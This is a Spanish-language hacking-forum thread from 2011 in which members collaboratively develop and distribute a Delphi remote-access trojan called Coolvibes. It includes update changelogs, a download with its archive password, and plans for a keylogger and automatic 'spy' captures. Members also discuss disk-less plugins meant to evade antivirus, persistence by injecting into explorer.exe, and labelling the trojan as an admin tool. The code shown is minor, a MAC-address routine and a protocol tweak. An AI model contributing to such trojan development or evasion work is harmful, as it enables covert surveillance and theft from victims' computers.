• Desarrollo CoolvibesRAT

  • Subforo donde se hara paso a paso un troyano en delphi.
Subforo donde se hara paso a paso un troyano en delphi.
 #297680  por 0k3n
 21 May 2011, 22:39
subo nueva update que he corregido algunos bugs bastante importantes.

Saludos
No tiene los permisos requeridos para ver los archivos adjuntos a este mensaje.
 #297739  por FFX
 22 May 2011, 03:18
Excelente RAT, veo que muy pronto sera el favorito de muchos por no decir de todos.

Sugerencia: Podrían agregar la opción de editar el registro aparte de eliminar y agregar nuevo, seria muy útil.

Arriba Indetectables.Net
 #297740  por mengyao
 22 May 2011, 03:25
Servidor de la lista de ventana de accidentes
Entorno de funcionamiento:
Windows XP SP3 China OS
informes de error de Windows
7bef_appcompat.rar
No tiene los permisos requeridos para ver los archivos adjuntos a este mensaje.
 #298056  por tk68
 23 May 2011, 01:39
Cuando se termine que hacer estable y funcional todo lo programado
hasta ahora, aquí está la lista de mejoras que quedan por hacer en
las funciones implementadas:

* Registro:
+ Editar entrada del registro (Se hará como en el regedit de windows)
+ Búsqueda en el registro
+ Acceso directo a las claves principales (Autorun etc...)

* Navegador de archivos:
- Para no liar quitaría lo de Portapapeles virtual y directamente ponía el Copiar/Pegar etc.
+ Copiar carpetas (Manteniendo estructura de subcarpetas si las hubiese, debería de ser así)
+ Bajar carpeta (Manteniendo estructura de subcarpetas si las hubiese, debería de ser así)
+ Comando Cortar (Así tenemos Cortar, Copiar y Pegar)
+ Comprimir archivo/carpeta (Muy práctico a la hora de bajar muchos archivos)
+ Navegar por la red
+ Comando editar (Nunca implementado en un RAT):
Se programaría así, cuando le damos a editar se descarga el archivo, se memoriza su fecha/hora, se
abre con nuestro editor asociado a ese archivo por nuestro sistema (podría configurarse), se monitorea
cada x seg. para verificar que no cambia su fecha/hora, si cambia es que ha sido editado/guardado y
por lo tanto lo resubimos. Se vuelve a memorizar su fecha/hora para seguir así hasta que el editor del
archivo se cierra dando por terminada la sesión de edición de ese archivo (hasta que no se cierre la
sesión de edición no se permitirá editar otro archivo).


*Operaciones a realizar desde el SIN:
Código: Seleccionar todo
Menú contextual sin desplegar:
~~~~~~~~~~~~~~~~~~~
- Abrir
+ Acceso directo
-----------
- Ping
- Cambiar nombre
+ Avisar cuando...
-----------
- Cerrar
- Actualizar
- Desinstalar
~~~~~~~~~~~~~~~~~~~

Y desplegado todo:
~~~~~~~~~~~~~~~~~~~
- Abrir
+ Acceso directo
  - Captura de pantalla
  + Plugins
    - Bromas
    - Mensajes
  -----------
  - Apagar
  - Cerrar sesión
  - Reiniciar
  - Suspender
  - Ibernar
-----------
- Ping
- Cambiar nombre
+ Avisar cuando...
  - Se detecte actividad
  - Cambie de ventana
-----------
- Cerrar
- Actualizar
- Desinstalar
~~~~~~~~~~~~~~~~~~~
*Captura de pantalla
+ Captura offline, permitiendo configurar intervalo, calidad, tamaño captura y tamaño carpeta almacén máx.
(cuando se llegue al tamaño max. configurado se van eliminado los archivos más antiguos)

*En control cambiaría el tab Extra por el de Plugins con el list de los plugins para poder ejecutarlos, ya que
los Extras ya se harán con Plugins

También queda por hacer (en ello estoy) dos guías:
- Guía del usuario de Coolvibes
- Guía del programador de Coolvibes

 #298067  por tk68
 23 May 2011, 02:20
Se me acaba de ocurrir, se podría poner una opción:
+ Espiar cuando se detecte actividad o cambie de ventana:
Espiar sería: Captura pantalla + Guardar captura + Activar keylogger
Podría añadirse esta opción a los accesos directos del SIN
bueno es una idea que podría implementarse...

Estoy viendo como ahorrar ancho de banda en la captura de pantalla también,
capturando solo lo que cambia de la pantalla entre capturas, estoy revisando
algunos códigos en C y VB

 #298147  por Invitado
 23 May 2011, 09:01
@tk68 con esto que propones tendremos un super-Rat va a ser la envidia de otros ya conocidos, esperando como oro en paño la guia de programación que estás realizando, así podremos comprender mejor el código y poder dar ideas de mejoras.

La versión 11 en windows 7, en un portatil cuando lo paso a inactividad o sea que cierro la tapa, luego cuando lo vuelvo a poner en marcha me sale un aviso de error en Servidor.exe que dejó de funcionar.
 #298161  por tk68
 23 May 2011, 11:13
angelp4491 escribió:[...]
La versión 11 en windows 7, en un portatil cuando lo paso a inactividad o sea que cierro la tapa, luego cuando lo vuelvo a poner en marcha me sale un aviso de error en Servidor.exe que dejó de funcionar
Se implementará primero lo más fácil, luego empezaremos con las mejoras más avanzadas, pero no se
continuará sin antes quedar estable lo realizado hasta ahora, por ejemplo el error que has reportado
lo tenemos que arreglar así como otros pequeños bugs. Es decir paso a paso pero quedando lo hecho
sin errores, no cometamos el fallo de otros RATs que hay en desarrollo

 #298163  por 0k3n
 23 May 2011, 11:42
@tk68 Grandes ideas algunas las cambiaría un poco, como la captura offline por ejemplo que la pondría como plugin en vez de como funcionalidad, pero todas son muy utiles


@angelp4491 solamente te pasa con la 11? Qué configuración le pones al servidor? Keylogger activado?

Saludos!
 #298175  por Invitado
 23 May 2011, 12:41
0k3n escribió:@tk68 Grandes ideas algunas las cambiaría un poco, como la captura offline por ejemplo que la pondría como plugin en vez de como funcionalidad, pero todas son muy utiles


@angelp4491 solamente te pasa con la 11? Qué configuración le pones al servidor? Keylogger activado?

Saludos!
Con las otras no he probado, pues fue ayer de casualidad que cerre el portatil un par de veces y las dos veces con el mismo error. Probaré las otras a ver si sucede lo mismo

estoy con los plugins y no hay manera de sacar nada en claro.

aqui te dejo una unidad que obtiene la mac del pc. Te agradeceria que conformaras un Plugins con ella, y así ver la estructura que tiene, porque con el Hola no me aclaro.
Código: Seleccionar todo
  unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, ComObj, StdCtrls;

type
  TForm1 = class(TForm)
    Button1: TButton;
    Label1: TLabel;
    procedure Button1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

uses NB30;

function GetMACAdress: string; 
var 
  NCB: PNCB;
  Adapter: PAdapterStatus; 

  URetCode: PChar;
  RetCode: char; 
  I: integer; 
  Lenum: PlanaEnum; 
  _SystemID: string; 
  TMPSTR: string; 
begin 
  Result    := '';
  _SystemID := ''; 
  Getmem(NCB, SizeOf(TNCB)); 
  Fillchar(NCB^, SizeOf(TNCB), 0); 

  Getmem(Lenum, SizeOf(TLanaEnum)); 
  Fillchar(Lenum^, SizeOf(TLanaEnum), 0); 

  Getmem(Adapter, SizeOf(TAdapterStatus)); 
  Fillchar(Adapter^, SizeOf(TAdapterStatus), 0); 

  Lenum.Length    := chr(0); 
  NCB.ncb_command := chr(NCBENUM); 
  NCB.ncb_buffer  := Pointer(Lenum); 
  NCB.ncb_length  := SizeOf(Lenum);
  RetCode         := Netbios(NCB); 

  i := 0; 
  repeat 
    Fillchar(NCB^, SizeOf(TNCB), 0); 
    Ncb.ncb_command  := chr(NCBRESET); 
    Ncb.ncb_lana_num := lenum.lana[I];
    RetCode          := Netbios(Ncb); 

    Fillchar(NCB^, SizeOf(TNCB), 0); 
    Ncb.ncb_command  := chr(NCBASTAT); 
    Ncb.ncb_lana_num := lenum.lana[I]; 
    // Must be 16 
    Ncb.ncb_callname := '*               ';

    Ncb.ncb_buffer := Pointer(Adapter); 

    Ncb.ncb_length := SizeOf(TAdapterStatus); 
    RetCode        := Netbios(Ncb); 
    //---- calc _systemId from mac-address[2-5] XOR mac-address[1]... 
    if (RetCode = chr(0)) or (RetCode = chr(6)) then
    begin 
      _SystemId := IntToHex(Ord(Adapter.adapter_address[0]), 2) + '-' + 
        IntToHex(Ord(Adapter.adapter_address[1]), 2) + '-' + 
        IntToHex(Ord(Adapter.adapter_address[2]), 2) + '-' + 
        IntToHex(Ord(Adapter.adapter_address[3]), 2) + '-' + 
        IntToHex(Ord(Adapter.adapter_address[4]), 2) + '-' + 
        IntToHex(Ord(Adapter.adapter_address[5]), 2);
    end; 
    Inc(i); 
  until (I >= Ord(Lenum.Length)) or (_SystemID <> '00-00-00-00-00-00'); 
  FreeMem(NCB); 
  FreeMem(Adapter); 
  FreeMem(Lenum); 
  GetMacAdress := _SystemID;
end; 

procedure TForm1.Button1Click(Sender: TObject);
begin
  label1.Caption := GetMACAdress;
end;

end.

 #298220  por 0k3n
 23 May 2011, 16:14
@tk68 muy buenas propuestas habrá que ir desarrollándolas poco a poco. Si necesitas ayuda con la documentación avisa :p

@angelp4491 aquí te subo un par de ejemplos de plugin Bromas y Mensajes para que mas o menos te hagas una idea.

Estaría bien que a partir de ahora el que esté trabajando en la nueva update lo ponga aquí en el foro para que haya un poco mas orden :p

Ahora mismo el que este montando la nueva update (si es que hay alguien) que cambie esta linea de FormMain.pas

Buffer := trim(Athread.Connection.ReadLn(#10#15#80#66#77#1#72#87));

por esta otra:

Buffer := (Athread.Connection.ReadLn(#10#15#80#66#77#1#72#87));

Que así se pueden mandar binarios en dirección servidor-> cliente sin miedo :p


También tenemos que pensar como desarrollaremos lo de los plugins, el Plugin Bromas y el Plugin mensajes yo creo que se podrían dejar con el cliente y después para los otros se podría hacer una web en PHP tipo: coolvibes.indetectables.net para postaer plugins y de paso para ir poniendo las releases compiladas...

Saludos!
No tiene los permisos requeridos para ver los archivos adjuntos a este mensaje.
 #298224  por Invitado
 23 May 2011, 16:30
0k3n escribió:@tk68 muy buenas propuestas habrá que ir desarrollándolas poco a poco. Si necesitas ayuda con la documentación avisa :p

@angelp4491 aquí te subo un par de ejemplos de plugin Bromas y Mensajes para que mas o menos te hagas una idea.

Estaría bien que a partir de ahora el que esté trabajando en la nueva update lo ponga aquí en el foro para que haya un poco mas orden :p

Ahora mismo el que este montando la nueva update (si es que hay alguien) que cambie esta linea de FormMain.pas

Buffer := trim(Athread.Connection.ReadLn(#10#15#80#66#77#1#72#87));

por esta otra:

Buffer := (Athread.Connection.ReadLn(#10#15#80#66#77#1#72#87));

Que así se pueden mandar binarios en dirección servidor-> cliente sin miedo :p


También tenemos que pensar como desarrollaremos lo de los plugins, el Plugin Bromas y el Plugin mensajes yo creo que se podrían dejar con el cliente y después para los otros se podría hacer una web en PHP tipo: coolvibes.indetectables.net para postaer plugins y de paso para ir poniendo las releases compiladas...

Saludos!
Gracias
 #298229  por 0k3n
 23 May 2011, 16:35
se me ha olvidado poner la contraseña :p

pass: indetectables.net
 #298904  por tk68
 25 May 2011, 19:50
0k3n escribió:[...]
Estaría bien que a partir de ahora el que esté trabajando en la nueva update lo ponga aquí en el foro para que haya un poco mas orden :p
[...]
Tengo unos días muy liado con el trabajo, para cuando me despeje un poco monto otra update,
a ratos libres voy haciendo pruebas, habría que ver si podemos hacer que el sistema de plugins
no escriba en disco para saltar mejor los avs, pero de momento el sistema actual es eficaz y
sencillo, pudiendo dejar esta mejora para más adelante.

Para que empiece a ser usable para un usuario final tenemos que poner en marcha el desinstalador
y actualizador del servidor.

Poco a poco estoy montando la documentación de Coolvibes con dos guías:
"Coolvibes. Guía para desarrolladores" y "Coolvibes. Guía para usuarios"
Será publicada en pdf, la primera en salir será la del usuario, la del desarrollador será la siguiente.

PD:
Coolvibes será definido en la documentación como una herramienta de administración remota de
equipos, realmente es esto.

 #299187  por 0k3n
 26 May 2011, 20:57
@tk68 De acuerdo, yo primero voy a agregarle alguna cosa mas y publico mi update y después tu la modificas y publicas la tuya :)
 #300119  por 0k3n
 29 May 2011, 18:41
Nueva Update, 12!

Changelog:
Código: Seleccionar todo
Fecha 29/05/2011
Versión: 1 Update 12
Modificación de: Anonimo
[*] Arreglados algunos bugs
[*] Ahora se puede elegir si guardar o no los plugins a el disco duro del remoto
[*] Cambiado el aspecto de algunos menús
[+] Añadida la opción de editar valores del registro
[+] Añadida posibilidad de cortar carpetas y archivos
[+] Agregado treeview opcional al visor de archivos
[*] Ahora también se pueden copiar carpetas
[*] Mejorado el visor de thumbnails
[*] Nuevo sistema de prioridad en la cola de descargas
Al desinstalar con la opción de persistencia activada, como no se desinyecta el monitor del explorer.exe, os quedara el proceso iexplore.exe en modo suspendido.

Algunas imágenes de las novedades:
Imagen
Menús re-diseñados y con algunas mas opciones

Imagen
Nuevo Treeview, visor de thumbnails mejorado y alguna opción mas agregada

Imagen
Nuevo sistema de prioridad

Imagen
Ahora se pueden modificar valores

Descarga:
Coolvibes v1.12.zip
Saludos!
No tiene los permisos requeridos para ver los archivos adjuntos a este mensaje.
  • 1
  • 7
  • 8
  • 9
  • 10
  • 11